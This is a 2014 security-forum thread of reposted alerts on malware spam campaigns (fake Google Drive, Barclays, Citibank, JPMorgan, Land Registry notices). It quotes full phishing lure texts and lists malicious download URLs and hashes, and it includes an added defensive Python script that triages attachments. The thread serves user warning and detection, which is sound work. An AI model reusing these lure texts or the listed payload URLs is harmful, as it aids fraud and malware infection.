SPAM frauds, fakes, and other MALWARE deliveries...
AplusWebMaster
2014-08-13, 12:18
FYI...
Fake Google drive SPAM - PDF malware
- http://myonlinesecurity.co.uk/grady-murphy-shared-google-drive3623019-73-malware/
13 Aug 2014 - "'Grady Murphy shared Google Drive:3623019-73 to submit@<your email address>' pretending to come from Grady Murphy <random name that matches the name inside the email>, Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links. The names of the alleged Google Drive owner who wants to share with you change with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
Confirm request
Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/
13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/28fd5d98d57d2289edfc3a327f7b9f493d4fc58c51a70cfbbd6b3474f7c65f68/analysis/1407913490/
178.238.236.109: https://www.virustotal.com/en/ip-address/178.238.236.109/information/
___
Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecurity.co.uk/order-id-769019-purelygadgets-com-word-doc-malware-malware/
13 Aug 2013 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of Word. On previewing it, or opening it in Word 2013 (which has macros disabled by default) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft Office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...
13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54*. All of these emails use social engineering tricks to persuade you to open the attachments that come with the email... Be careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/3d53b54d98e14f9de2a2316fe09ee6b9fe27f2dacdd4ad85f52dd1e16eebb006/analysis/1407936811/
___
UK Land Registry Spam
- http://threattrack.tumblr.com/post/94637538213/uk-land-registry-spam
Aug 13, 2014 - "Subjects Seen:
Notification of direct debit of fees
Typical e-mail details:
Notification Number: 4682787
Mandate Number: LND4682787
###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
You can access these by opening attached report.
If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
Thank you,
Land Registry
Malicious File Name and MD5:
LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8c26e0fcb0496b40853e9589e35632c0/tumblr_inline_na95u2Ihd01r6pupn.png
Tagged: UK Land Registry, Upatre
AplusWebMaster
2014-08-14, 13:54
FYI...
Fake Citicorp SPAM – PDF malware
- http://myonlinesecurity.co.uk/citicorp-mail-report-attached-fake-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk .com
14 August 2014 Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54*. This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0875c59c8f7c69befb7dce934db7c9652614a9ad90cabc37721f56114bb026f0/analysis/1408010403/
___
Fake Charity Trends SPAM ...
- http://blog.mxlab.eu/2014/08/14/backdoor-bot-ed-attached-to-emails-with-subject-like-oder-invoice-9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is sent from a spoofed address and has the following body:
Dear *******@*******.co.uk,
Please find attached invoice #9156230_08 from 13/08/2014.
Thanks!
Reyes Mcdaniel .
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx
The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines detected the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/4ac7416ea64789afabee6c7ff152cf4c552c303baef009270adca11238667bc4/analysis/1408011038/
- http://blog.mxlab.eu/2014/08/14/fake-charity-trends-email-regarding-donation-contains-trojan/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is sent from a spoofed address and has the following body:
Charity Trends®
Dear *******@*******.com,
Thank you for your generous donation of 2623 GBP, which we received today.
Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
You will find all information about your donation in zip archive. You are making a difference!
Thanks again for your kindness,
Elsa Nash ...
The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Inside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustotal.com/en/file/3158101b5a61094a960bc3e4a17240c153efa8cbb6b1eaa26e6d2ab6c06cafe9/analysis/1408011666/
___
Fake Citibank SPAM - PDF malware
- http://myonlinesecurity.co.uk/citibank-re-account-documents-uploaded-fake-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
citibank .com
RE: Account Documents
To: <REDACTED>
Case: C4055427
Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...
14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54*. This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/110dc2cdabc3ffcc924312b44e025072ec2641bf55bdcc8abdc426ddd9e8eced/analysis/1408029154/
___
ZeroLocker
- http://www.webroot.com/blog/2014/08/14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older cryptolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot.com/blog/wp-content/uploads/2014/08/blograrw.bmp
This newest addition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI until all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___
Suspicious login message Faked, distributes Backdoor
- http://blog.trendmicro.com/trendlabs-security-intelligence/suspicious-login-message-faked-distributes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___
Beware of Risky Ads on Tumblr
- https://blog.malwarebytes.org/malvertising-2/2014/08/beware-of-risky-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.
dailynewsz[dot]tumblr[dot]com
We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dailynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=yllix.com/
** http://labs.sucuri.net/?blacklist=yllix.com
*** https://www.mywot.com/en/scorecard/yllix.com
AplusWebMaster
2014-08-15, 17:11
FYI...
Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu/2014/08/15/fake-email-transaction-completed-from-barclays-contains-trojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is sent from the spoofed address “Barclays.NET” <support@ barclays .net> and has the following body:
Transaction is completed. 8678 GBP has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Barclays.Net 2013 Corporation. All rights reserved.
The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB large file Payment receipt 8821991.exe (note: file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines detected the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/baa52d35dd98c788729f661c9c9d7b4053fcbdb3083943b9d517b83fe38063a6/analysis/1408097500/
___
Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu/2014/08/15/fake-email-from-voip-inc-installs-trojan-downloader-using-word-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality from Word. This email is sent from spoofed addresses and has the following body:
Thank you for ordering from VOIP Inc.
This message is to inform you that your order has been received and is currently being processed.
Your order reference is 488910845598.
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
You have chosen to pay by credit card. Your card will be charged for the amount
of 805.74 USD and “VOIP Inc.”
will appear next to the charge on your statement.
Your purchase information appears below in the file.
The attached ZIP file has the name Order.zip and contains the 41 kB large file Order.Doc. The Order.Doc is a genuine Word document but the file contains a malicious macro feature. Once the Word document is opened, instructions are given on how to enable the content and activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines detected the trojan downloader at Virus Total*..."
* https://www.virustotal.com/en/file/af8694825d3d7eb470255b9dd858e6544ac54df9295bb373bc8205e8fe27722c/analysis/1408099896/
AplusWebMaster
2014-08-19, 20:06
FYI...
Fake Companies House Spam
- http://threattrack.tumblr.com/post/95187807503/companies-house-annual-return-spam
Aug 19, 2014 - "Subjects Seen:
(AR01) Annual Return received
Typical e-mail details:
Thank you for completing a submission Reference # (9586474).
(AR01) Annual Return
Your unique submission number is 9586474
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.
Malicious File Name and MD5:
AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/342609410f7d088e77e269adf8ed8b38/tumblr_inline_nak1zyZubX1r6pupn.png
Tagged: Companies House, Upatre
___
JPMorgan Chase Secure Message Spam
- http://threattrack.tumblr.com/post/95215399913/jpmorgan-chase-secure-message-spam
Aug 19, 2014 - "Subjects Seen:
Daily Report - August 19, 2014
Typical e-mail details:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Malicious URLs:
192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe
Malicious File Name and MD5:
message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
Java_update.exe (38d75db0a575891506b1ff0484a03cd0)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/332320ce00484e282636a9e2d20b0764/tumblr_inline_naklp7JVOT1r6pupn.png
192.241.124.71: https://www.virustotal.com/en/ip-address/192.241.124.71/information/
Tagged: JPMorgan, Chase, Dyreza
___
- http://myonlinesecurity.co.uk/jpmorgan-chase-co-daily-report-august-19-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014.png
... the html attachment that comes with the email looks like the below and clicking the link hidden behind the Click to read message button leads to a fake Java_update.exe
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Daily-Report-August-19-2014_2.png
Today's date: Java_update.exe .. Current Virus total detections: 5/53*
All of these emails use social engineering tricks to persuade you to open the attachments that come with the email... Be careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/003529bb37382ad19d22b39d3295e297220c21d59418eb1b861ac3a7fb012a96/analysis/
___
Fake Evernote extension serves Ads
- https://blog.malwarebytes.org/intelligence/2014/08/fake-evernote-extension-serves-advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/chrome_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/evernote.png
Clicking “Visit website” directs the user to the chrome webstore page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote log in screen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/fake_evernote_chrome_store.png
On the surface, it may seem like the pop-ups and advertisements are coming from the websites themselves, but they are in fact from the fake Evernote web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustotal.com/en/file/6a15febcf9a963a2c5122a71d690b5987f78d59b7e9bc5f28f991ce53043fbf4/analysis/
___
Fake Scotiabank SPAM – PDF malware
- http://myonlinesecurity.co.uk/scotiabank-new-instructions-international-local-transfers-fake-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear Clients
Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
We take this opportunity to inform you that the operations of International Transfers can be made via our internet platform banking the need to complete these types of forms.
Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...
18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52*. This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2d844bbc8af9af835423ef9d862d86eac7f2f07812c0e0b263124de9e9d98b68/analysis/1408393889/
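The posts in this thread keep repeating the same triage advice: turn on "show known file extensions", look at what the unzipped file really is rather than at its icon, never enable macros in a mailed Office document, and treat an HTML attachment whose "Click to read message" button leads to an .exe (the JPMorgan/Dyreza sample above) or a ".pdf" that is really a ZIP (the Order sample later in the thread) as hostile. The script below is an added example, not code from this thread or from any of the quoted blogs, that automates that check on file content instead of file name: it sniffs the leading bytes, compares them with what the final extension claims, flags double extensions and executable or screensaver suffixes, looks for the UTF-16LE stream names an OLE2 Word/Excel file carries when it holds a VBA project (a string match, not an OLE parser, so a heuristic only), expands ZIP attachments one level, and pulls executable links out of HTML attachments. The sample attachments it builds are constructed stand-ins named after the lures quoted in the posts; they hold a bare MZ header or a marker string, not malware, and the 192.0.2.1 address in the HTML sample is a documentation-range placeholder.

```python
"""Triage e-mail attachments on their content, not their icon or displayed name.
Added example with constructed samples; nothing here is real malware."""
import io
import re
import zipfile
from dataclasses import dataclass, field

# Suffixes Windows runs on double-click (not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
# What the content should look like if the final suffix is honest.
EXPECTED_FORMAT = {".pdf": "pdf", ".doc": "ole2-office", ".xls": "ole2-office",
                   ".docx": "zip", ".xlsx": "zip", ".html": "html", ".htm": "html",
                   ".zip": "zip", ".exe": "pe-executable", ".scr": "pe-executable"}
# Leading bytes of the formats these campaigns imitate or deliver.
MAGIC = [(b"MZ", "pe-executable"), (b"%PDF-", "pdf"),
         (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2-office"), (b"PK\x03\x04", "zip")]
# OLE2 stores stream names as UTF-16LE; these two appear when a binary Word/Excel
# file carries a VBA project. A string match, not a parser: heuristic only.
VBA_MARKERS = ["_VBA_PROJECT".encode("utf-16-le"), "Macros".encode("utf-16-le")]
LINK_RE = re.compile(rb"""(?:href|src)\s*=\s*["']?([^"'\s>]+)""", re.I)

@dataclass
class Verdict:
    name: str
    fmt: str
    findings: list = field(default_factory=list)

def sniff_format(data: bytes) -> str:
    """Classify by leading bytes, with a loose fallback for HTML."""
    for magic, fmt in MAGIC:
        if data.startswith(magic):
            return fmt
    return "html" if re.match(rb"\s*<(?:!doctype|html)", data[:256], re.I) else "unknown"

def extensions(name: str) -> list:
    """Lower-cased suffixes of the basename: 'Inv.xls.scr' -> ['.xls', '.scr']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return ["." + p for p in base.lower().split(".")[1:]]

def triage_file(name: str, data: bytes) -> Verdict:
    fmt, exts = sniff_format(data), extensions(name)
    last = exts[-1] if exts else ""
    v = Verdict(name, fmt)
    if last in EXECUTABLE_EXTS:
        v.findings.append(f"executable extension {last}")
        if len(exts) >= 2 and exts[-2] in EXPECTED_FORMAT and exts[-2] not in EXECUTABLE_EXTS:
            v.findings.append("double extension: a document suffix in front of the executable one")
    expected = EXPECTED_FORMAT.get(last)
    if expected and fmt != "unknown" and fmt != expected:
        v.findings.append(f"extension {last} claims {expected}, content is {fmt}")
    if fmt == "ole2-office" and any(m in data for m in VBA_MARKERS):
        v.findings.append("Office binary document carries a VBA macro project (heuristic)")
    if fmt == "html":
        for url in LINK_RE.findall(data):
            if url.lower().rsplit(b".", 1)[-1] in (b"exe", b"scr", b"zip"):
                v.findings.append(f"HTML links to {url.decode(errors='replace')}")
    return v

def triage_attachment(name: str, data: bytes) -> list:
    """Judge the attachment, then expand a ZIP one level and judge each member."""
    verdicts = [triage_file(name, data)]
    if sniff_format(data) == "zip" and extensions(name)[-1:] not in ([".docx"], [".xlsx"]):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            verdicts += [triage_file(i.filename, zf.read(i)) for i in zf.infolist() if not i.is_dir()]
    return verdicts

def suspicious(name: str, data: bytes) -> bool:
    return any(v.findings for v in triage_attachment(name, data))

def build_samples() -> dict:
    """Constructed stand-ins named after the lures quoted in the thread (not real malware)."""
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60                          # bare DOS header
    macro_doc = MAGIC[2][0] + b"\x00" * 24 + VBA_MARKERS[0]          # OLE2 header + marker
    html = (b'<html><body><a href="http://192.0.2.1/securemail/Java_update.exe">'
            b"Click to read message</a></body></html>")             # 192.0.2.1: documentation range

    def zipped(members: dict) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            for member, blob in members.items():
                zf.writestr(member, blob)
        return buf.getvalue()

    return {
        "Payment receipt 1534465.zip": zipped({"Payment receipt 8821991.exe": pe_stub}),
        "9156230_08.zip": zipped({"Inv_3145835_453_979154.xls/Inv_3145835_453_979154.xls.scr": pe_stub}),
        "Bestellen.zip": zipped({"Bestellen.Doc": macro_doc}),
        "order-6539-8.20.2014.pdf": zipped({"order 8.20.2014.exe": pe_stub}),
        "message_zdm.html": html,
        "report.pdf": b"%PDF-1.4\n% constructed benign sample\n",
    }

if __name__ == "__main__":
    for name, blob in build_samples().items():
        for v in triage_attachment(name, blob):
            print("SUSPECT" if v.findings else "ok", v.name, v.fmt, "; ".join(v.findings))
```

Run it as a script to see one verdict line per attachment and per ZIP member; only report.pdf comes back clean. The point of keying everything off `sniff_format` is that the icon Explorer shows and the suffix the sender chose are both attacker-controlled, while the first bytes of the file are what Windows will actually act on. The VBA check is deliberately a marker match so it stays dependency-free; a proper OLE2 directory walk (or a password-protected archive, which this does not open) is where you would extend it.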
AplusWebMaster
2014-08-20, 14:07
FYI...
Cryptolocker flogged on YouTube
- http://www.theregister.co.uk/2014/08/20/cryptolocker_flogged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo, who will present at the upcoming Virus Bulletin 2014 conference in Seattle, wrote in a paper that advertising networks were a viable way to flog viruses and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware, allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.uk/2014/08/19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victim pay up to $500 in BitCoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.uk/2014/08/19/fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attackers' code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregister.co.uk/2014/08/11/cryptowall_malvertising_yahoo_ad_network/
> https://www.virusbtn.com/conference/vb2014/abstracts/KashyapKotovNavaraj.xml
___
Fake Order SPAM – PDF malware
- http://myonlinesecurity.co.uk/order-pdf-malware/
20 Aug 2014 - "'Order – PDF', which comes as an email with a subject of order-6539-8.20.2014.pdf (where the number is random and the date changes daily), is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf (the number is random). They appear to come from a load of common first names with weird characters forming the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
Today’s version, although it pretends to be a PDF file, is actually a zip file that probably either uses some unknown exploit to extract itself, or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all, so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for the pdf: 2/50*. Current Virus total detections for the extracted .exe: 2/53**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f84c3bb9f4dcb2961193ad4cdbcd7e882a14f0e19a5f8f68c8aa8c5bd73ba7e0/analysis/1408523288/
** https://www.virustotal.com/en/file/3e135db147e93080de32d3bc5eb27049dec5542493062cc2c7e338d901ddf559/analysis/1408523722/
___
'Reveton' ransomware adds powerful password stealer
- https://www.computerworld.com/s/article/9250503/_Reveton_ransomware_adds_powerful_password_stealer
Aug 20, 2014 - "A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable via various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.com/2014/08/19/reveton-ransomware-has-dangerously-evolved/
** http://blog.trendmicro.com/trendlabs-security-intelligence/key-figure-in-police-ransomware-activity-nabbed-2/
___
Linux Trojan makes the jump to Windows
- http://www.theinquirer.net/inquirer/news/2361245/chinese-linux-trojan-makes-the-jump-to-windows
